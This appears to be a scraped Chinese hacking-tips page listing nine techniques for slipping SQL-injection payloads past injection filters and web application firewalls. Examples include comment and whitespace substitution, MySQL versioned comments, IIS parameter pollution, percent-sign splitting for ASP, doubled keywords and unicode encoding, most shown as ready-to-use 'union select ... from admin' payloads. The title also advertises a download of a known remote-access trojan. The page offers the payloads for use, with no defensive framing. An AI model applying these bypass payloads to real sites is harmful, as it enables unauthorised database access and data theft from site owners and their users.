|
绕过防注入系统 包括WAF的测试等多个方案 灰鸽子下载
方案一、 把测试代码的空格替换成 /**/ 或者+ (注:/**/ 和+ 不要进行url编码)
?
如果要保持原样复制代码,需要双击后,选择代码右键复制即可
01
02
03 如: id=1 or 1=1
id=1/**/or/**/1=1
id=1+or+1=1
方案二、把空格替换成非可见字符 %09 %0A %0D %0B
?
如果要保持原样复制代码,需要双击后,选择代码右键复制即可
01
02
03
04 如: id=1 or 1=1
id=1%09or%091=1
id=1%0Aor%0A1=1
id=1%0A%0Bor%0A%0B1=1
方案三、把关键字用 /*!*/包起来,注,这个方法只适用于mysql数据库的站点
?
如果要保持原样复制代码,需要双击后,选择代码右键复制即可
01
02 如: id=1 and 1=1
id=1 /*!and*/1=1
方案四、使用参数污染法攻击绕过,注,该方法只适用于webserver是微软的IIS的情况下
?
如果要保持原样复制代码,需要双击后,选择代码右键复制即可
01
02 如: id=1 union select 1 from admin
id=1 union/*&id=*/select/*&id=*/from/*&id=*/admin
方案五、使用%绕过,注,该方法只适用于asp/aspx
?
如果要保持原样复制代码,需要双击后,选择代码右键复制即可
01
02 如: id=1 union select 1 from admin
id=1 un%io%n sel%e%ct 1 fr%o%m ad%m%in
方案六、使用%23 (明文为#号)和%0A配合使用绕过,注,这个方法只适用于mysql数据库的站点
?
如果要保持原样复制代码,需要双击后,选择代码右键复制即可
01
02 如: id=1 union select 1 from admin
id=1%23afafasdf%0Aunion%23afafasdf%0Aselect%23afafasdf%0A1%23afafasdf%0Afrom%23afafasdf%0Aadmin
方案七、使用重复关键字绕过
?
如果要保持原样复制代码,需要双击后,选择代码右键复制即可
01
02 如: id=1 union select 1 from admin
id=1 ununionion seleselectct 1 frofromm admin
方案八、使用unicode编码绕过
?
如果要保持原样复制代码,需要双击后,选择代码右键复制即可
01
02 如: id=1 union select 1 from admin
id=1 %u0075%u006e%u0069%u006f%u006e select 1 %u0066%u0072%u006f%u006d admin
方案九、使用畸形包绕过,只适用于 asp/aspx,详情可以看80sec的站点
|
|